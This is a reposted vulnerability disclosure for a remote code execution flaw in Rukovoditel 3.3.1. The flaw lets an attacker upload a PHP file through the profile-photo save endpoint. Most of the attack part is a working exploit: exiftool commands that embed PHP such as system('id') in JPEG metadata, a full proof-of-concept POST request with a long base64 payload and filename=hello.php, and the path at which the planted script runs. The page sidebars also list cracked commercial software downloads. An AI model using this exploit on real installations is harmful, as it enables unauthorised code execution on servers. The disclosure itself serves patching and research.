LEFT SIDEBAR AD

Hidden in mobile, Best for skyscrapers.

Rukovoditel 3.3.1 — Remote Code Execution (RCE)

1 year ago 79
BOOK THIS SPACE FOR AD
ARTICLE AD

Rukovoditel 3.3.1 — Remote Code Execution (RCE)

This is a remote code execution vulnerability found in Rukovoditel v3.3.1.This vulnerability was discovered by me on April 10, 2023.

Rukovoditel is an open source application designed for installation on your own local server or Internet server with PHP/MySQL support.
Any User using this app can set their own profile photo.And if you ignore the file upload security check, the vulnerability occurs.
For example Rce,XSS LFI and etc.

In this application, the file upload process consists of 2 steps.First step upload, second step save.
You can review the code below:

File upload step:

The first condition checks whether a file has been uploaded and whether it is an image, using the is_image() function. If the condition is true, the code proceeds to the next step.

The next line generates a temporary filename for the uploaded file using the tmp_filename() method of the fieldtype_user_photo class, passing in the temporary name of the uploaded file.

If the tmp directory in the user’s file system does not exist, the code creates it using the mkdir() function.

The move_uploaded_file() function moves the uploaded file to the tmp directory. If the file is moved successfully, the code generates a JSON response that includes the name and file path of the uploaded file, then exits.

Save step:

The first line uses a ternary operator to set the filename variable to either the value of $_POST[‘filename’] or a temporary filename generated by the tmp_filename() method of the fieldtype_user_photo class.

The second line removes any ‘data:image/png;base64,’, ‘data:image/jpeg;base64’, ‘data:image/gif;base64’ expressions and decodes the base64 encoded data in $_POST[‘img’]

The third line writes the decoded image data to a file in the /tmp directory under the users’ workspace directory using the file_put_contents() function.

The next block checks whether the uploaded file is an image using the is_image() function. If it is not an image, the uploaded file is deleted using the unlink() function. If it is an image, the code resizes the image using the image_resize() function, which takes the input filename, output filename, and target width as arguments.

You see that this code does no further validation beyond checking if the uploaded image is an image.No validation in filename

This PHP snippet checks if the file specified by the $path variable is an image file. To do this, it is first checked whether the file exists with the is_file() function. Then the MIME type of the file is retrieved using the mime_content_type() function, and if this MIME type is an image file type (JPEG, PNG, GIF, ICO), the function returns true. Otherwise, the function returns false. If $path is not the specified file path, false is still returned.

The mime_content_type() function determines the MIME type by looking at the file content. It uses the MIME database to determine the MIME type of a file, using MIME types recognized by the operating system. This database is usually kept in the /etc/mime.types file. The function takes a string parameter pointing to a filename or file path and returns the correct MIME type. However, MIME type determination is not entirely reliable and can sometimes yield misleading results.

This and all previous versions are affected

1)First of all, we need to inject the php codes into the metadata of any jpeg file with exiftool. (for example)

exiftool -overwrite_original -comment=”<?php system(‘id’); ?>” index.jpeg

exiftool -overwrite_original -DocumentName=”<?php phpinfo(); ?>” index.jpeg

2)after that we need to get the base64 code of the image (i used this site)
https://h3yy0.csb.app/

3)and we have to do url encoding

4)now we have to upload profile photo

5)Poc request (I changed the file name to hello.php and and pasted our base 64 code)

POST /index.php?module=users/photo&action=save&token=34GtgxfEmO HTTP/1.1
Host: localhost
Content-Length: 9567
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/index.php?module=users/account
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cookie_test=please_accept_for_session; sid=0d3esjp74uo3q3gp38r044vc9h; sidebar_closed=1
Connection: close

img=data%3Aimage%2Fjpeg%3Bbase64%2C%2F9j%2F4AAQSkZJRgABAQAAAQABAAD%2F4QB4RXhpZgAATU0AKgAAAAgABQENAAIAAAAWAAAASgEaAAUAAAABAAAAYAEbAAUAAAABAAAAaAEoAAMAAAABAAEAAAITAAMAAAABAAEAAAAAAAA8P3BocCBlY2hvICdzYWxhbScgPz4AAAAAAQAAAAEAAAABAAAAAf%2F%2BABU8P3BocCBwaHBpbmZvKCk7ID8%2B%2F9sAhAAJBgcSEhIVExMTFRUVFRYXFxUVFhUVFhgWFhUVFhYVFRUVGB0oIBgaJR0VFSExISUpKy4uLhcfMzgzLTcoLS4rAQoKCg4NDhoQEBstJR8lLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS3%2FwAARCAEqAKkDASIAAhEBAxEB%2F8QAGwAAAgMBAQEAAAAAAAAAAAAABAUCAwYBBwD%2FxAA8EAABAwIEAwYFAgUDBAMAAAABAAIRAyEEEjFBBVFhBiJxgZGhE7HB0fAy4RQjQlJiB3LxFVOCkhYz0v%2FEABkBAAMBAQEAAAAAAAAAAAAAAAECAwQABf%2FEACMRAAICAwEBAAICAwAAAAAAAAABAhEDITESQSJRE3EEMmH%2F2gAMAwEAAhEDEQA%2FAMhSCvYFVSaiWNWA2k2IqmFQxqJphBjIuYFcxqqar6YU2URYwK0NX1MKxKxkVOCFrBGuCFroBFWJSPHp5iSkePKrAnPhn8UhgisUhVsjwxS6fFRcplQcmQpWVxi6V1iYAVRCMphC0AjaYUpDom0KUL4BSShHdFFMQlNXscos0BLArmIdhV7CgFBNMIqmxDUkXSSMoi5rVbCraFNIxkQqIDEFGVXJfiCgEW4pyRY5yc4spFjSq4yWQT4hDq%2BsqFsXDEzpUCplQKZAKypUwolTpJgBtAIxgQtAIxgUWOiYCkvgF2EoRswq1qrYrmBSNBbTKJpqhgRNMJWFF9IIukEPSCJppGUQS0LjwuNXXJRkDVSgayPqIGuuCKsWkWNT7FpFjVXGRyCeqqSr6qoK2Ixs%2BUSpKLkUAqKtpBVlXUQiwINoBGMCGoBFtCkyiJBdhdC%2BSnDemiGBDsRFNRNBewIhiopq9oQYyCKaKpCUJTCYUWhoBO%2Bg%2BvgkodFnwiBOyi5dGOI0Fuu%2BiJyNfZtn8v6b6X2XOP6G2uiyqga6YVxFjql2IKUIrxZSPGJ1i3JJiyrYyOQVVkO5E1UO5a0Y2cUSpqLkUAqKIohUImgEWBB1AItoQ1AIpoUWURJfKQC%2BylA4bU1cxUMKuYVE0BNNEU0KwoikUGMg2gyfAXPgrcRVJv8AkbBcayAG8wHO8%2F0j6%2BaBxmLuYS1bovDSsJa46%2Fn5ZMcI0Nk7xcCJ8JSDDYq48dFsMNTytBy5Z1dmHzta0W5rTHHojPJQDjaeemH6uaBmkQSJgEjnokGIC1mJGQjdryQZtqI5m%2F5ssxj6Ra4tOxj91myKpDxdoR4wJLignWLSbEp8ZLILKqHciqg1Qz1qRkZEKJXVwpgEAiqAQ7GE7J5wjg1SpBIyt5nfwG6EmGKb4Qw7Z0Wt4B2PrVyC4FjT%2FwC0fRabsh2PY0B7h4E6nr0W6%2BG1ggAKDlfC6xpdMxg%2ByOHo3LQTzN%2Fmiv4DD%2F2N9ArOLYsCBE5vy6F%2BC78Kk3bNChS3o80arWKDArmBMSLWImkEOwImiLhKEN4jVyueOsDwFh8knxZBumPG3RUd4yPO%2FwBVnMXioF0yjtmi7ii2li8jpWx4Bxb4gykw7WMhqA%2FXSNF50yuC4X3%2FACStnwfE0gA2mXPdF%2FhkwP8AyJv42C1QRmymmxp7plvgQ076TMTe6Q46iajQ4fqbZw6bHy09ETVxThIdL7Gx29CSleHxZD80WM5m8wbO9ZlZ8sdjYnoDrcIqOmIS%2FF9na2wB81r3jK8NFxFp3B0KhVfJndGMa4JJ30wFbs%2FXE9wqqh2crvdlyGSJE9F6EcWGgjddxGJjK5pgxrsqJknBGOZ2HqhhLjDpAA%2BcrlLsqxpPxX2GwTrGceeJB1Wfo4t9V8CSSYHqklNlIYl9HGHFMRTpUxOgMSfFbfs72ciKlW51A%2B6H7K9nxT77oc%2F5dAtc2dlFS9F2lHgSx0aQqsc4ZC7yI%2FPy6Ar1BeLHzS%2BrxJ4BaTM9U%2F8AIoqmCOFt2gPG4oMFWsb%2FAAmy3q42bPnHovPf%2Bt4n%2FuuWi7b4rJTpUQYL%2FwCZU8JhgPuVjYRxxpEf8ifqf9DVhVzSh2K1pShCWFGYJsuA5lAsRuHOVwifwLvoxXTpZy8uJysFiTvoB8lj%2BMVxnMGwWp4szLRYN3Brj5idPArHYtsPE3Gn2VYr4P6%2Bjbs%2FwxtbvPIa3rv4D6rWMxNGk0MpjSLC2m7haVluH4ZzZOWzhEGQJEEB0XjWyfMqOs0tjLAd3ctzoZ0ynQEclZaM0nbLzWLgY535np4IOuCDOm33Tvh2EDiJ7rh%2Btuo6OHQ3XOJcPgdPlp9VLJwbHLZRWr5zTI5RPgNlB7h8R7TItIPKRKpwlKInY36QHTPomGMDXUnP2gt87%2FQhSjKiskAurTGYXiD%2BeqXY6o6iCDdp9p0PoQp06hhoPJve%2BR%2Bc9Aqs09xxmC5hB%2Ftgwm9C0KsnxJMnaPBc7JvLcSwRuZ80x4ZhmuDmaFs%2BcbfNNMHwkBwezUjRSnLVFILZvsA0QIPzRxa78ulfB2d2%2FJGGoWAmDHqhi4Ge2DcQxDmiImdOfql%2FD8Nmcc2ky48gLm6YDHseQMw1u0iEk%2F1AxJosLKboDyAYtaJKMoqT%2FwCD%2B3jg9bMNx7HGtXqP2LiG9GizQPJLoUiFyFc84ZtVjVUCptUzQE0dUZkJe07BB4YSUfmRSs6xZ2jxUv8AID2Snh%2BDNV8TA8BcHWAdUXxDCPqP%2Bf7lMcDhPhiD5J72df40MMLhW5cpAkWI52gEctijsPYlp7wI7s8jEtPT88A6T9Drt7osFG7J0X0AAQRb80K5iq8gjxHqNl83QIV93X5%2BxsfeChJ6pjRX0WYqq5shsmYA6g5QYHt6q11eKFSmYBDh7getw72VtOO5a9p6ET%2F%2BVXWw4NzoSHR07zr%2BsJFEpYFw2kXYeSNHFt%2BQdb3EeapxlGHtcLjfmRpJ8reStocRyVfhx3bevdd6zKKxjJLdg5pHnAc0%2B8IPQVsAxWHdSxIqCcj4vyJABB8fqthgoLmiJEfMD7FLa9djKbA%2B%2BYWnmIP2THAPhwgzYX6H%2Fg%2BqlPY8TS4BgIBj82RteiHiNuiowzIty%2B10a1yC0hW9ifFcMZT73t91lP8AU%2BoIoN%2FqcC4%2BwC2%2BIMvaOsn7LzDt%2FXc%2FFunQABvQDknx9FytuOzNLikuK5lGIVjQoBWNKmaA7h9GTPJEuYQvsGMrR1XcQ9E4pdIQ76hJ%2FPmu1H9ZVbKU8vzkdkAltOqR9fumuCOa2qW0KAP0kX9d05wbYCZAZe0QIQVZ0GdPzRFvJOirfh51XM5I%2BwNBrjprBBG17%2FMoTizfhSIs6b9M7XT7lEYQPpOtBHK3nBV%2Fal7X0Wm1nRP%2B5swfzZcn%2BJzX5IUcR4WKlJ1Zgu2XjqWy75W9EMaxNKm8%2FwBAg9CCNfULQ9kW56UO3%2BRMGfRKuM4AsFfZs%2FEbyyklnyLUJbVhi90U8c71TDU9QWyPIAfJo9Vp8LhhTLfAfQfRZPgwdUrYcn%2BhnvafcStpxxuSmx4mxA8Z%2FwCR6JWtDXuh1h%2F0g87%2FAGRLXSEPg%2B%2FRkakeiswtPKLlJKL%2BHJkKreaw3%2BouAPcqgCNCd1vHtk6FKu1WCz4WoInKJHklhakdPcTx5fLpXFqMg8%2FhlKnRuE2NBVmnCUqiis8NCHrVSfz2Usc09UtfiHN6hcOE1JOinh6bvuVU3GsIuYI5i6ErY92bue6NIGzQ4Yhv5KPbWA3CyNKvWcYhN8Lw9x1cUrGSHT8fSZ%2Bp%2BX83Vdfi1Bl8r3E7kEeFiRHqhW020qlJ7mh4ZUu0%2FwBXddYyOcJFx%2BsRSqO1cAcvibSEXukmdajbaHv%2FAMloudDpadJiI%2Bf2XeNvNSmWNIMnNaYBymSPH6pLjeGNfh3VDYtygbXIM%2FIJd2X4o8PFN5JABif7QYA%2BaXy2hlOJt%2BzLXNbF7WPOdIHXXy8UZ2ieH06otGXJ5Dl5%2FJLaeIygHwP7np08FKpWmmZN5%2FYT5R6ITTSo6FN2JOzlU52nkI00IsfZekcTp%2FEoOtNrdSPxywXZzAuJcRp6zAXpLyKNJpcL2DRzPKErl0PnaYPwkFmHaCIJvHIbSiMPXboXjwkD2WW41xCpLJJDTUY2GyP1FMuJ06VFrKgAD2lgJ3cHnK4HncyPBNCMpKxJTgpV9NFlnr6pJ22xPwsK8yQXDKI6pkys9sQJEXMLJ%2F6p4r%2BXTaP6jJ8gjFbFk3R5qSuL5cVCB6GWKjEU0UFViSIU7NFC2sbGUlc9odGx629wn8SlHEsFFwmujkidPANqiY0RdDhrabbjXmgOH4ks1kjxTl%2BNYRsTvJsCntC00L8Y3Ldo8VfwrHgWIA8QVCpUDiIcAdov5IXFU4u4R129UskNF%2FB7jqAqMJaYNvCQbRsstXrtnLVEGbg6Eg2g%2BSYYbEuaCWvA5zp6KOMqtqznYPEW9Cp2U82KOPdqAafwqelpaLy6ILiefRK%2BBUnPc1%2Bwt7%2FuiMfw5oMga9VdgKnw2kbk%2FVXh5rRGSdmxcO59EPVqQ2Jv%2B1lfTdmY2%2ByoqMlw%2FwBwHvF%2FVDLw7D003Y%2FC38b%2B8pp2p4m1mIpMeQGw6JtJso9mGBoAkTb2S%2FttgW4lxBaHZdDu3S4KhSrZbstEcbUohzTUcA1rg%2FSZLdAs7j%2BOfxuIbSpAhucF5mRDTLWjzufAJJiuEhrodUdG0l59pWj4F8KiIo0yXf3ER6IuajGrBHF%2BVnoeEqWvy%2BQXmvb%2BoXVYvDRZbnhLXuEuEDX8KwXaum19V2U94f0nXy5roNy2JkSjoyJXy7UEG6iqmdm%2BOIsg6teUsoYrNurwSNUtFxhhWyr69C0FA4GtBTSmZ3QCIshabiyn%2FwBKbUBLbHknNXDg2P55qgUiwjK0HrAXa%2Bj7fBGzhmR2pBHNMalF20TyIsU4o0w8S8eBghTfw0HT13VFC%2BEpTrplK1BzdW%2B0geaGq1cojbY6eX%2FK1fEuEtiRr4rN43BfDEkAnly%2B6nLHJMpDLFoUYhzrDblM%2BaGyknfX66lM6PDnv70fuunBx49E6VCt2w3C1YZAPmmGFINjrt4i8pPSadDa6OwtM6ei6QYm14XLWg7qyu4io5w%2FqbInnyQfCHFxDfD8%2BSauwjnCwUZ9RSP0wFSm6pVOaxm%2B0eHVang%2FDTtpyn8lEN4J3jAvvoneDwIbEgSOUqLTkyvpJFePr%2FBoujYaryPidfM8md16F264gGMyc15fXqSVpiZJs6a4dZ%2Fk7fz5qPwf8h6qhfKlkKGXDaZiUZ8UjRWYamAwQoVKKmzSi7C1ATJt1H2TfDVpsNOv3SLDsM2Gm50CZ03gbyUQDoNkXI9VV8CqD08QLeahQNiZjwt76oqizNE6bn9yj5TO9NEsO2%2F6gOYufoneDa076pc7DgHXyGvmrMO%2FIYA99PS6eE%2FDEnD2i%2FiWG7pWYxXDabhd5BJ3%2BQlbppD2%2FSPukHFsI4WcyRzkg%2Bg1VslPaI47TpmPr4dzM2UhzRo2fC0LlAjuh4yudoLz6lNMRgACSx5Y4i%2BaR4QFfhsHVEEhj7ad2T6eCgumhrQrrYbK5rnjubuFi0%2F5Dl1RNMtL%2B5BHiD8lpv4MOblLRJ1vYTsk2H4O3CudAEPIItqTIDfdLm0tFf8AHpvYz4G0ioDl3WwxTAxo1naNboPs9gAA17rnl15pxjGOcRAA%2FwAje3glxxl4uXRc04udR4AsoODC6Lu238lEHKLj1RGNrBoA1jUyR5SLDzQb8Q46OPg4AjyK5pIVNsyfbzCFzM4JtyK8xqF3Mnx%2By9n7SMaaLg9pFtW39ivI8bw17Zcwioz%2B5u3%2B5uoTRuicwAv8PQKMrhXyYQ01CS0fJfPbHX5eu67g7Nj3O6JaxsXueSSi9i7MSYnwA%2BgCNw7I1t81XWa7%2Bnujpb1OpUcOQ3aT6D7n2XI5jQPAFvMxMesAJhwwtIzEl52E2CQ4hznw39gOvII%2Fh%2BLFOwvtO3kmToDVmhY4umwHlr66rhbDe873t4QNUFWxQYwvefAX8kLwh1Su%2FM6Q1tmjSSflCbTArQ9wpJuCbXnT0G3mranFmhzabpJPLbzXKzxTZA13PU6BZ3D1C7EPB1AbpsBf1v6eJU3Ly9DqPpbNZU4c0iRBB5j6hDN4fTBGgjaYAR1fE%2FDp5heIt05DqrcOGYhoc0CTqFVeX%2FZJuS%2FoEaWC5cD0aCpvomqWkAw3SfqjmcMDdtdUVUeykOsbJXFjKa%2BFmApwLnRdxWPa02hx2k2H2WM4n2myOLXtI5EeyqPFQ6C07D0%2FSVOWVRVDxwuWzQOqPkmd7h0kCeY1b4gkdAradGbjuncatd1EWKXYOu53Uj3CbsMAcjtyPQqSkpdHlFxBOMUyabhOUxvcH1XkWJxfw3uBpw4G%2BUlvnuvZsdem7wO30%2Bi8c4%2FTBcTo4HyLToQdwrwf6ITX7BKmIo1P1Nc0%2FwBwA9wPoq%2F4aj%2F3x%2F6O%2ByCXE9kqNSTYRb5r5rjsiH0e4DOyXvnqpvTNC2hi0tdqZKhXwp12UcM8MufRdxOKLrgfZMKU%2FEkQPT7lfNxTaQzEgu2b9Y%2BSFpYeo8kzlaNY3jZSwlFgqZn338Tt5Lq%2FYb%2FQZh6hd%2FMrWAuxvXnC0fB8U1jLfqJ9AVnq1I1CMo7uwO%2F7JhkcBDbaT5LnaOVM0GFpmo8Oce6BJHhuVn%2BFVM%2BIq1m6fEjxGnoiqLXii7XM%2BRPJql2bwAYXsNpAI8VOrKcH2IIdmaOX0Q%2FB3mnOsX8uYQ2CDnB97h0Ejlsu1GFrgA4kjprshK07DFJqhk3ipa8yTlIge6W4jjJzFoMkGZ6bITEZgTmaYkacuiV4vA5jmbII0I36FSlllwrHFHoxfiBUOctnaPoQjsNw4G4bH%2FIKA4CGkwT3hYg6rStw5iWuIjbZSVyY8pKPC7D4ctEgeSm3EnNlcIG30K%2BoV8wg2PNcxBtBE9Vakloz3b2EEyCF5J2kohlZzDZpJj%2FB28f4nXzXrGHYSJ6XXm%2FbMMfUcBZzfcbHyNvNWxPRLKjH1GEGCoK1zpEHUaHpyVSoRNzw8B1JqA4jSOylwXEHImfww7qg1ZROmZumS39RsoDiJc8Nju8k%2FwATwjNokGJwppOkFLtdKafBnWxOW1sqFo0%2FjElkgDfmgHV7QSi6WOyNAbpuB9U%2BmTpoZYaoaegvpJ08U5wpaRJMmBMb%2BCS0sYxwg26dUbhsGcvdMCPNH1RyVmgwVQFnegE6DkJSXtTxQ0nNLLEub6C%2Fup4J7py72AJ6an5JZ2poZi0cgozybVF4Y9Mf9jcdnzTGbWOY5p1XhzszQPDY%2FZeacCxxpugzykajqtieKGmATDmO%2FrGx%2FwAgmjNNeWLKDTtDTG1csOjo5p2QwImYgHUIKvxHMIInkdiPFcqvygGfIqOSrKwToK4hw5tqtMnNFwN13C401GQHd4DwnoUNS4uGyLR%2BaJdjy4VWvpWB1CRtJWOot6G2Fxb2kgG41a76FNsE51TaOiRYSi97w5y13CsNCRNzdI6dRV%2FQ2jShhleS9qaJbXNQXEmeo3C9gxr4YV55x%2FB5gTC1N%2BaRlUfabPOcRTg201HgqkTjaRa4hDKhB6NbwdkUpTKhUgX33S3g7D8FW1A5cyo5OJAGhJOiUcSwbnXi6JbV2BiEQ089Pn4o9Bww2LwbmnzUqNNzW2uNytXicCKh5jc%2FRUPwEDQxyCXyP6X0yzQ4u1IG%2FXoFpOGcShuUiwi8%2Bv50VQ4Xm0EHdWUsDl7safk%2BKnKTXSsEmOeFYhtR9RznABoEeElBV3tr1jl%2FSLDx5pXXpEERa8ny0C7wbE%2FALXu0c6I%2BqlakW8%2BdlFekKeIIOhhOMe2sGfyntcP6mkd4DmOaFx5biHlzdQdemyJp4R1rd4W%2Fdc3TBVoqw2LqNYJaHTrFh6bFcw9cum5N9Dt0T%2FAYMx3hr0R%2BC4VTzERce6RtvgycUIcPwn4rTcghOOE8NNgdk6p4UMcLI1lEA5hodQh%2FG30V5f0fYbAgBFUSGmykyoEO0HMrpKPDNbl0vxwlhKQYmkHNiFpK7RkISEFdkDjPOO0nDoJIWb%2BEvUeO4IOaVjP%2BndE0J6BkhbsM4Q4%2FCBRcZkPgYFNoHJdbWiVVk0QqHKbXRGGql5gk%2BH3XzL3t4KLxl0uV3A9CXUHD%2Bq2yvpVIF7nQKNCubDL5fcqz4ZJEmDrbZdZ1BdHDEeJ%2FCVVSpAuI%2FCpF%2BUanxOpVrW5QTPJTkUihdxjDMYDz2WS4hXtTZGhK2GOpBzc7jqQADzOgWX4zQBrBjb5bHxWZaZq6hr2cwsSTpBlPeH1W1HcxzHPaVLgNMCjmIuAZHh%2ByE7O04cS3TMbdJRbB2zUUgGiNRt0U8xnTz381RnJMGxGhUatYwDNzZH0T8hWcz3tET8WR4IDDvdbNed0Y4aQipCtHZMgjcI3DHUEXQtSsGiPwKbcQDeU619Eew1wOUrO1nQ4haGk%2ByQ8RZ%2FMQy8sOPtA%2BJbmakv8AAp9Ch8FSTKtGG4Y6WAK80Qd7oXhmiYYZb6tGO6ADTc11zZGYWo0mSVbi2iEmqmNEnCi2M8RijTPcV1HHgkE25%2Fug8Fc3V2LaINtkr0OthWJxIqOpie6XCY36JpiCBfzWX4UP5g8QtBjj3h%2Ft%2Bqm%2BD1TE%2FaCq92Qgw1rp89JVlPh2Qhx3E%2BpRPHgPhf8Ak36JjxQfyR5KL4WT4FYWGsyxflzlC8KDQSWm8mW76q2kf%2Fr%2FANo%2BaTOMYq1vBDWgJXZo3uLiYEGFPD0QBJMrlU2KroG351Rq3sHzQxztjNcRrK7U4nTy2MoSibFBUB3kVKhPF9GP8UXX12V2Ao%2F8LmEAlGkLl%2BW2c9aQWxtkh4i8iotC39Kz%2FFP1hPl%2F1FxdLmXC%2Bhdo6K2FNIZn%2F9k%3D&filename=hello.php

6)we visit the file

http://localhost/uploads/users/tmp/hello.php

Exploit-db: https://www.exploit-db.com/exploits/51322

Youtube poc video: https://www.youtube.com/watch?v=Ai9i-fG7uwM

Linkedin: https://az.linkedin.com/in/mirabbasagalarov

Github: https://github.com/1mirabbas

Read Entire Article
  3. Rukovoditel 3.3.1 — Remote Code Execution (RCE)

Related

Flamingo Finance Bug Bounty Program

Flamingo Finance Bug Bounty Program

VAPT: The Secret Weapon for Security Superheroes

VAPT: The Secret Weapon for Security Superheroes

How We Hacked Voice Communication Solutions Company And Found BAC + Info Disclosure + IDOR :D

How We Hacked Voice Communication Solutions Company And Found BAC + Info Disclosure + IDOR :D

Bug Bounty Challenge (final): Day 8–28/04/2024

Bug Bounty Challenge (final): Day 8–28/04/2024

Mi camino en el Bug Bounty comienza, pero antes..

Mi camino en el Bug Bounty comienza, pero antes..

24.2 Lab: HTTP request smuggling, confirming a TE.CL

24.2 Lab: HTTP request smuggling, confirming a TE.CL

Trending

1. Mahadev betting app
2. ISL
3. CSK बनाम SRH
4. Daryl Mitchell
5. PM Modi
6. Tottenham vs Arsenal
7. Arvinder Singh Lovely
8. GT बनाम RCB
9. India Women vs Bangladesh Women
10. Prajwal Revanna

Popular

1-click RCE in Electron Applications

1-click RCE in Electron Applications

Install waybackurls on Kali Linux

Install waybackurls on Kali Linux

Over 40 Apps With More Than 100 Million Installs Found Leaking AWS Keys

Over 40 Apps With More Than 100 Million Installs Found Leaking AWS Keys

Microsoft Office Professional Plus 2019 (x64 & x86) Multilingual + Pre-Activated

Microsoft Office Professional Plus 2019 (x64 & x86) Multilingual + Pre-Activated

Install DalFox on Kali Linux

Install DalFox on Kali Linux

Adobe Master Collection CC 2022 v25.08.2022 (x64) Multilingual Pre-Activated

Adobe Master Collection CC 2022 v25.08.2022 (x64) Multilingual Pre-Activated

‘We are not motivated by profits’ – Open Bug Bounty maintainers on finding a niche in the crowdsourced AppSec market

‘We are not motivated by profits’ – Open Bug Bounty maintainers on finding a niche in the crowdsourced AppSec market

Maxon CINEMA 4D Studio S22.123 (x64) Multilingual + Crack

Maxon CINEMA 4D Studio S22.123 (x64) Multilingual + Crack

Just Gopher It: Escalating a Blind SSRF to RCE for $15k

Just Gopher It: Escalating a Blind SSRF to RCE for $15k

SketchUp Pro 2020 v20.2.172 (x64) Multilingual + Patch

SketchUp Pro 2020 v20.2.172 (x64) Multilingual + Patch

BOOK THIS SPACE FOR AD
RIGHT SIDEBAR BOTTOM AD
Bengali (Bangladesh) Bengali (Bangladesh) · English (United States) English (United States) ·
About Us · Terms & Condition · Contact Us
© Security Alert 2024. All rights are reserved